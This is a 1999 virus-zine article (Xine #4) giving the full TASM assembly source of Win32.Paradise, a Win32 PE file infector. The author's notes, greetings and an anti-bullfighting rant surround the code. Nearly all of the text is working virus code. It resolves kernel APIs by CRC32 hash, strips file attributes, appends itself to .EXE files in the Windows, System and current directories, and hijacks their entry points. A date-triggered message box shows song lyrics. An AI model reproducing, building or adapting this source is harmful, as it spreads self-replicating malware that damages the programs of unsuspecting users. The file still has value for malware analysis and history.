/-----------------------------\ | Xine - issue #4 - Phile 216 | \-----------------------------/ ; [Win32.Paradise] - Bugfixed and improved version of Iced Earth ; Copyright (c) 1999 by Billy Belcebu/iKX ; ; ÞßÛÜÝÜ Welcome to another Billy's production. ; ÜÜÜÜ ÜÞÞÛÛÝÜ ÜÜÜ Enjoy this new... ; ÞÞßÝÛßÜÜßÛÛÝÜÛÛßÛßßÜ ; ß ÝÞÝÞÞßßÜÛßÛßÞÝÞÞ ÝßÜ ; ß ÜÜÛßÛÜÛßßÝÜÜß Þ ; ÜßÛÞÞÞÞ ÛÝ ÝÝÝÝßÜ ÜÜÜ ÜÜÜ ÜÜÜÜÜ ÜÜÜ ÜÜÜ ÜÜÜÜÜÜ ÜÜÜÜÜÜ ; ÜßÝÝÝÞß ÞÛ ßÝ ÝÞßÝ Û ÛÜÛ Û ÛÜ ÜÛ Û ßÛÛ Û ÛÜÜÜÜßÛ ÛÜÜÜÜßÛ ; Þ ß ÛÝ ß Û ßÜß Û ÜÛ ÛÜ Û ÛÜß Û ÜÛÜÜÜßÛ ÛßÜÜÜÛÛ ÜÜÜ ; ÞÛ ÛÜÛßÛÜÛ ÛÜÜÜÛ ÛÜÛßÛÜÛ ÛÜÜÜÜÛß ÛÜÜÜÜÜÛ ÛÜÛ ; ÝÜ ÛÝÞ ÜÜÜÜÜÜÜ ÜÜÜÜÜÜÜ ÜÜÜÜÜÜÜ ÜÜÜÜÜÜÜ ÜÜÜÜÜÜ ÜÜÜÜÜ ÜÜÜÜÜÜÜ ÜÜÜÜÜÜÜ ; ÜÜÞÜÛÞÛÜÛÜÝ Û ÜÜÜ Û Û ÜÜÜ Û Û ÜÜÜ Û Û ÜÜÜ Û Û ÜÜ ßÛ ÛÜ ÜÛ Û ÜÜÜÜÛ Û ÜÜÜÜÛ ; ÜÛßßß ßß ßßßß Û ÜÜÜÜÛ Û ÜÜÜ Û Û Ü ÜÜÛ Û ÜÜÜ Û Û ÛÜß Û ÜÛ ÛÜ ÛÜÜÜÜ Û Û ÜÜÜÛÜ ; ÛÜÛ ÛÜÛ ÛÜÛ ÛÜÛÜÜÜÛ ÛÜÛ ÛÜÛ ÛÜÜÜÜÛß ÛÜÜÜÛ ÛÜÜÜÜÜÛ ÛÜÜÜÜÜÛ ; ; Virus Name : Paradise ; Virus Author : Billy Belcebu/iKX ; Origin : Spain ; Platform : Win32 ; Target : PE files ; Compiling : TASM 5.0 and TLINK 5.0 should be used ; tasm32 /ml /m3 paradise,,; ; tlink32 /Tpe /aa /c /v paradise,paradise,,import32.lib, ; Notes : Not very innovative, just made for practice some things, as ; CRC32 GetAPI engine, and such like. The name comes from one ; of the best songs i've ever heard, and probably my favouri- ; te song of Stratovarius. Its lyrics are, sadly, an actual ; reality: we are killing the nature slowly and without any ; kind of mercy, thinking that we can make any use of every- ; thing around without any responsability... ; Greetings : It is very clear... to all the Stratovaius fans (specially ; to Int13h and Owl) and all the ecologist activists. ; Fucks : To everything related to the bullfights, the greatest act ; of the human barbarism with the animals, the spanish's ; national shame; and to all the acts that go againist the ; rights of the animals and/or the vegetables, as well as ; with the persons (goddamn fascisms!). ; ; Rojo, sangre ; un color muy nacional ; morbo, suerte ; sol y arena pide Dios ; arte, muerte ; sirve de alimento ; pase, valiente, ; y vuelta al ruedo!!! ; Cuando el acero me traspasa el corazon ; y se le llama fiesta ; y otra vuelta de tuerca ; cuando el sadismo se convierte en tradicion ; y la faena en gesta ; y nadie se molesta ; -Reincidentes- ; .586p .model flat ; ÚÄ----ùùùúúú ú ; : Paradise virus - Data, macros and such like shit : ; ú úúúùùù---ÄÄÙ extrn MessageBoxA:PROC extrn ExitProcess:PROC virus_size equ (offset virus_end-offset virus_start) heap_size equ (offset heap_end-offset heap_start) total_size equ virus_size+heap_size shit_size equ (offset delta-offset Paradise) section_flags equ 00000020h or 20000000h or 80000000h temp_attributes equ 00000080h n_infections equ 04h mark equ 04Ch ; Only hardcoded for 1st generation, don't worry ;) kernel_ equ 0BFF70000h kernel_wNT equ 077F00000h ; Interesting macros for my code cmp_ macro reg,joff1 ; Optimized version of inc reg ; CMP reg,0FFFFFFFFh jz joff1 ; JZ joff1 dec reg ; The code is reduced in 3 endm ; bytes (7-4) apicall macro apioff ; Optimize muthafucka! call dword ptr [ebp+apioff] endm .data szTitle db "Paradise v1.00",0 szMessage db "Paradise - Visions - Stratovarius",10 db "Virus size............" db virus_size/1000 mod 10 + "0" db virus_size/0100 mod 10 + "0" db virus_size/0010 mod 10 + "0" db virus_size/0001 mod 10 + "0" db " bytes",0 db "Copyright (c) 1999 by Billy Belcebu/iKX",0 .code ; ÚÄ----ùùùúúú ú ; : Paradise virus - Virus startz here : ; ú úúúùùù---ÄÄÙ virus_start label byte Paradise: pushad ; Push all da shit pushfd call delta_ ; Hardest code to undestand ;) delta: db "[iKX4EVER" ; Yeah... iKX :) delta_: pop ebp mov eax,ebp sub ebp,offset delta sub eax,shit_size ; Obtain at runtime the sub eax,00001000h ; imagebase of the process NewEIP equ $-4 mov dword ptr [ebp+ModBase],eax call ChangeSEH ; SEH rlz :) mov esp,[esp+08h] jmp RestoreSEH ChangeSEH: xor ebx,ebx push dword ptr fs:[ebx] mov fs:[ebx],esp mov esi,[esp+2Ch] ; Get program return address and esi,0FFFF0000h ; Align to page mov ecx,5 call GetK32 mov dword ptr [ebp+kernel],eax ; EAX must be K32 base address lea esi,[ebp+@@NamezCRC32] lea edi,[ebp+@@Offsetz] call GetAPIs ; Retrieve all APIs call PrepareInfection call InfectItAll call payload or ebp,ebp ; Is 1st gen? jz fakehost RestoreSEH: xor ebx,ebx pop dword ptr fs:[ebx] pop eax popfd popad mov ebx,12345678h org $-4 OldEIP dd 00001000h add ebx,12345678h org $-4 ModBase dd 00400000h push ebx ret ; ÚÄ----ùùùúúú ú ; : Paradise virus - Retrieve directories to infect : ; ú úúúùùù---ÄÄÙ PrepareInfection: lea edi,[ebp+WindowsDir] push 7Fh push edi apicall _GetWindowsDirectoryA add edi,7Fh push 7Fh push edi apicall _GetSystemDirectoryA add edi,7Fh push edi push 7Fh apicall _GetCurrentDirectoryA ret ; ÚÄ----ùùùúúú ú ; : Paradise virus - Infect windows, windows\system and the current dir : ; ú úúúùùù---ÄÄÙ InfectItAll: lea edi,[ebp+directories] mov byte ptr [ebp+mirrormirror],dirs2inf requiem: push edi apicall _SetCurrentDirectoryA push edi call Infect pop edi add edi,7Fh dec byte ptr [ebp+mirrormirror] cmp byte ptr [ebp+mirrormirror],00h jnz requiem ret ; ÚÄ----ùùùúúú ú ; : Paradise virus - Searching... Seek and infect! : ; ú úúúùùù---ÄÄÙ Infect: and dword ptr [ebp+infections],00000000h ; reset countah lea eax,[ebp+offset WIN32_FIND_DATA] ; Find's shit push eax lea eax,[ebp+offset EXE_MASK] push eax apicall _FindFirstFileA cmp_ eax,FailInfect mov dword ptr [ebp+SearchHandle],eax __1: push dword ptr [ebp+ModBase] push dword ptr [ebp+OldEIP] push dword ptr [ebp+NewEIP] call Infection pop dword ptr [ebp+NewEIP] pop dword ptr [ebp+OldEIP] pop dword ptr [ebp+ModBase] inc byte ptr [ebp+infections] cmp byte ptr [ebp+infections],n_infections jz FailInfect __2: lea edi,[ebp+WFD_szFileName] mov ecx,MAX_PATH xor al,al rep stosb lea eax,[ebp+offset WIN32_FIND_DATA] push eax push dword ptr [ebp+SearchHandle] apicall _FindNextFileA or eax,eax jz CloseSearchHandle jmp __1 CloseSearchHandle: push dword ptr [ebp+SearchHandle] apicall _FindClose FailInfect: ret ; ÚÄ----ùùùúúú ú ; : Paradise virus - Infect found file : ; ú úúúùùù---ÄÄÙ Infection: lea esi,[ebp+WFD_szFileName] ; Get FileName to infect push 80h push esi apicall _SetFileAttributesA ; Wipe its attributes call OpenFile ; Open it cmp_ eax,CantOpen mov dword ptr [ebp+FileHandle],eax mov ecx,dword ptr [ebp+WFD_nFileSizeLow] ; 1st we create map with call CreateMap ; its exact size cmp_ eax,CloseFile mov dword ptr [ebp+MapHandle],eax mov ecx,dword ptr [ebp+WFD_nFileSizeLow] call MapFile ; Map it cmp_ eax,UnMapFile mov dword ptr [ebp+MapAddress],eax mov esi,eax ; Get PE Header mov esi,[esi+3Ch] add esi,eax cmp dword ptr [esi],"EP" ; Is it PE? jnz NoInfect cmp dword ptr [esi+mark],"SDRP" ; Was it infected? jz NoInfect push dword ptr [esi+3Ch] push dword ptr [ebp+MapAddress] ; Close all apicall _UnmapViewOfFile push dword ptr [ebp+MapHandle] apicall _CloseHandle pop ecx mov eax,dword ptr [ebp+WFD_nFileSizeLow] ; And Map all again. add eax,virus_size call Align xchg ecx,eax call CreateMap cmp_ eax,CloseFile mov dword ptr [ebp+MapHandle],eax mov ecx,dword ptr [ebp+NewSize] call MapFile cmp_ eax,UnMapFile mov dword ptr [ebp+MapAddress],eax mov esi,eax ; Get PE Header mov esi,[esi+3Ch] add esi,eax mov edi,esi movzx eax,word ptr [edi+06h] dec eax imul eax,eax,28h add esi,eax add esi,78h mov edx,[edi+74h] shl edx,3 add esi,edx mov eax,[edi+28h] mov dword ptr [ebp+OldEIP],eax mov edx,[esi+10h] mov ebx,edx add edx,[esi+14h] push edx mov eax,ebx add eax,[esi+0Ch] mov [edi+28h],eax mov dword ptr [ebp+NewEIP],eax mov eax,[esi+10h] add eax,virus_size mov ecx,[edi+3Ch] call Align mov [esi+10h],eax mov [esi+08h],eax pop edx mov eax,[esi+10h] add eax,[esi+0Ch] mov [edi+50h],eax or dword ptr [esi+24h],section_flags mov dword ptr [edi+mark],"SDRP" lea esi,[ebp+Paradise] xchg edi,edx add edi,dword ptr [ebp+MapAddress] mov ecx,virus_size rep movsb jmp UnMapFile NoInfect: dec byte ptr [ebp+infections] mov ecx,dword ptr [ebp+WFD_nFileSizeLow] call TruncFile UnMapFile: push dword ptr [ebp+MapAddress] apicall _UnmapViewOfFile CloseMap: push dword ptr [ebp+MapHandle] apicall _CloseHandle CloseFile: push dword ptr [ebp+FileHandle] apicall _CloseHandle CantOpen: push dword ptr [ebp+WFD_dwFileAttributes] lea eax,[ebp+WFD_szFileName] push eax apicall _SetFileAttributesA ret ; ÚÄ----ùùùúúú ú ; : Paradise virus - Get KERNEL32.DLL base address (simplest method) : ; ú úúúùùù---ÄÄÙ GetK32 proc _@1: jecxz WeFailed cmp word ptr [esi],"ZM" jz CheckPE _@2: sub esi,10000h dec ecx jmp _@1 CheckPE: mov edi,[esi+3Ch] add edi,esi cmp dword ptr [edi],"EP" jz WeGotK32 jmp _@2 WeFailed: mov ecx,cs xor cl,cl jecxz WeAreInWNT mov esi,kernel_ jmp WeGotK32 WeAreInWNT: mov esi,kernel_wNT WeGotK32: xchg eax,esi ret GetK32 endp ; ÚÄ----ùùùúúú ú ; : Paradise virus - Get all API addresses : ; ú úúúùùù---ÄÄÙ GetAPIs proc @@1: lodsd ; Get in EAX the CRC32 of API push esi push edi call GetAPI_ET_CRC32 pop edi pop esi stosd ; Save in [EDI] the API address cmp byte ptr [esi],0BBh ; Last API? jz @@4 ; Yeah, get outta here jmp @@1 ; Nein, loop again @@4: ret GetAPIs endp GetAPI_ET_CRC32 proc xor edx,edx xchg eax,edx ; Put CRC32 of da api in EDX mov word ptr [ebp+Counter],ax ; Reset counter mov esi,3Ch add esi,[ebp+kernel] ; Get PE header of KERNEL32 lodsw add eax,[ebp+kernel] ; Normalize mov esi,[eax+78h] ; Get a pointer to its add esi,1Ch ; Export Table add esi,[ebp+kernel] lea edi,[ebp+AddressTableVA] ; Pointer to the address table lodsd ; Get AddressTable value add eax,[ebp+kernel] ; Normalize stosd ; And store in its variable lodsd ; Get NameTable value add eax,[ebp+kernel] ; Normalize push eax ; Put it in stack stosd ; Store in its variable lodsd ; Get OrdinalTable value add eax,[ebp+kernel] ; Normalize stosd ; Store pop esi ; ESI = NameTable VA @?_3: push esi ; Save again lodsd ; Get pointer to an API name add eax,[ebp+kernel] ; Normalize xchg edi,eax ; Store ptr in EDI mov ebx,edi ; And in EBX push edi ; Save EDI xor al,al ; Reach the null character scasb ; that marks us the end of jnz $-1 ; the api name pop esi ; ESI = Pointer to API Name sub edi,ebx ; EDI = API Name size push edx ; Save API's CRC32 call CRC32 ; Get actual api's CRC32 pop edx ; Restore API's CRC32 cmp edx,eax ; Are them equal? jz @?_4 ; if yes, we got it pop esi ; Restore ptr to api name add esi,4 ; Get the next inc word ptr [ebp+Counter] ; And increase the counter jmp @?_3 ; Get another api! @?_4: pop esi ; Remove shit from stack movzx eax,word ptr [ebp+Counter] ; AX = Counter shl eax,1 ; *2 (it's an array of words) add eax,dword ptr [ebp+OrdinalTableVA] ; Normalize xor esi,esi ; Clear ESI xchg eax,esi ; ESI = Ptr 2 ordinal; EAX = 0 lodsw ; Get ordinal in AX shl eax,2 ; And with it we go to the add eax,dword ptr [ebp+AddressTableVA] ; AddressTable (array of xchg esi,eax ; dwords) lodsd ; Get Address of API RVA add eax,[ebp+kernel] ; and normalize!! That's it! ret GetAPI_ET_CRC32 endp ; ÚÄ----ùùùúúú ú ; : Paradise virus - Some useful subroutines : ; ú úúúùùù---ÄÄÙ Align proc push edx xor edx,edx push eax div ecx pop eax sub ecx,edx add eax,ecx pop edx ret Align endp TruncFile proc xor eax,eax push eax push eax push ecx push dword ptr [ebp+FileHandle] apicall _SetFilePointer push dword ptr [ebp+FileHandle] apicall _SetEndOfFile ret TruncFile endp OpenFile proc xor eax,eax push eax push eax push 00000003h push eax inc eax push eax push 80000000h or 40000000h push esi apicall _CreateFileA ret OpenFile endp CreateMap proc xor eax,eax push eax push ecx push eax push 00000004h push eax push dword ptr [ebp+FileHandle] apicall _CreateFileMappingA ret CreateMap endp MapFile proc xor eax,eax push ecx push eax push eax push 00000002h push dword ptr [ebp+MapHandle] apicall _MapViewOfFile ret MapFile endp CRC32 proc cld xor ecx,ecx ; Optimized by me - 2 bytes dec ecx ; less mov edx,ecx NextByteCRC: xor eax,eax xor ebx,ebx lodsb xor al,cl mov cl,ch mov ch,dl mov dl,dh mov dh,8 NextBitCRC: shr bx,1 rcr ax,1 jnc NoCRC xor ax,08320h xor bx,0EDB8h NoCRC: dec dh jnz NextBitCRC xor ecx,eax xor edx,ebx dec edi ; Another fool byte less jnz NextByteCRC not edx not ecx mov eax,edx rol eax,16 mov ax,cx ret CRC32 endp payload proc lea eax,[ebp+SYSTEMTIME] push eax apicall _GetSystemTime cmp word ptr [ebp+ST_wMonth],6 ; On the sixth month... jnz no_payload cmp word ptr [ebp+ST_wDay],6 ; On the sixth day... jnz no_payload lea eax,[ebp+szUSER32] push eax apicall _LoadLibraryA call @?_1 db "MessageBoxA",0 @?_1: push eax apicall _GetProcAddress push 00001000h lea ebx,[ebp+mark_] push ebx lea ebx,[ebp+song] push ebx push 00000000h call eax no_payload: ret payload endp ; ÚÄ----ùùùúúú ú ; : Paradise virus - Virus data : ; ú úúúùùù---ÄÄÙ mark_ db "[Win32.Paradise v1.00]",0 song db "Late at night i found myself again",10 db "wondering and watching TV",10 db "I can't believe what's on the screen",10 db "something that i wouldn't like to see",10 db "Many rare species will perish soon",10 db "and we'll be short on food",10 db "Why do we have to be so selfish",10 db "we have to change our attitude",10 db "I know that i am not",10 db "the only one that's worried",10 db "Why don't we all",10 db "wake up, and and realize",10 db "Like the birds in the sky",10 db "we are flying so high",10 db "without making anykind of sacrifice",10 db "We've got so little time",10 db "to undo this crime",10 db "or we'll lose our paradise",10 db "It seems to me that there's no sense at all",10 db "nobody cares, it's always the same",10 db "Mother nature's crying out in pain",10 db "I know we are the ones to blame",10,10 db "Paradise [ Stratovarius ]",0 db "Copyright (c) 1999 by Billy Belcebu/iKX",0 EXE_MASK db "*.EXE",0 szUSER32 db "USER32",0 @@NamezCRC32 label byte @FindFirstFileA dd 0AE17EBEFh @FindNextFileA dd 0AA700106h @FindClose dd 0C200BE21h @CreateFileA dd 08C892DDFh @DeleteFileA dd 0DE256FDEh @SetFilePointer dd 085859D42h @SetFileAttributesA dd 03C19E536h @CloseHandle dd 068624A9Dh @GetCurrentDirectoryA dd 0EBC6C18Bh @SetCurrentDirectoryA dd 0B2DBD7DCh @GetWindowsDirectoryA dd 0FE248274h @GetSystemDirectoryA dd 0593AE7CEh @CreateFileMappingA dd 096B2D96Ch @MapViewOfFile dd 0797B49ECh @UnmapViewOfFile dd 094524B42h @SetEndOfFile dd 059994ED6h @GetProcAddress dd 0FFC97C1Fh @LoadLibraryA dd 04134D1ADh @GetSystemTime dd 075B7EBE8h db 0BBh align dword virus_end label byte heap_start label byte kernel dd kernel_ infections dd 00000000h NewSize dd 00000000h SearchHandle dd 00000000h FileHandle dd 00000000h MapHandle dd 00000000h MapAddress dd 00000000h AddressTableVA dd 00000000h NameTableVA dd 00000000h OrdinalTableVA dd 00000000h Counter dw 0000h @@Offsetz label byte _FindFirstFileA dd 00000000h _FindNextFileA dd 00000000h _FindClose dd 00000000h _CreateFileA dd 00000000h _DeleteFileA dd 00000000h _SetFilePointer dd 00000000h _SetFileAttributesA dd 00000000h _CloseHandle dd 00000000h _GetCurrentDirectoryA dd 00000000h _SetCurrentDirectoryA dd 00000000h _GetWindowsDirectoryA dd 00000000h _GetSystemDirectoryA dd 00000000h _CreateFileMappingA dd 00000000h _MapViewOfFile dd 00000000h _UnmapViewOfFile dd 00000000h _SetEndOfFile dd 00000000h _GetProcAddress dd 00000000h _LoadLibraryA dd 00000000h _GetSystemTime dd 00000000h MAX_PATH equ 260 FILETIME STRUC FT_dwLowDateTime dd ? FT_dwHighDateTime dd ? FILETIME ENDS WIN32_FIND_DATA label byte WFD_dwFileAttributes dd ? WFD_ftCreationTime FILETIME ? WFD_ftLastAccessTime FILETIME ? WFD_ftLastWriteTime FILETIME ? WFD_nFileSizeHigh dd ? WFD_nFileSizeLow dd ? WFD_dwReserved0 dd ? WFD_dwReserved1 dd ? WFD_szFileName db MAX_PATH dup (?) WFD_szAlternateFileName db 13 dup (?) db 03 dup (?) directories label byte WindowsDir db 7Fh dup (00h) SystemDir db 7Fh dup (00h) OriginDir db 7Fh dup (00h) dirs2inf equ (($-directories)/7Fh) mirrormirror db dirs2inf SYSTEMTIME label byte ST_wYear dw ? ST_wMonth dw ? ST_wDayOfWeek dw ? ST_wDay dw ? ST_wHour dw ? ST_wMinute dw ? ST_wSecond dw ? ST_wMilliseconds dw ? heap_end label byte fakehost: pop dword ptr fs:[0] pop eax popfd popad xor eax,eax push eax push offset szTitle push offset szMessage push eax call MessageBoxA push 00000000h call ExitProcess end Paradise ; Komandos de autodefensa animal!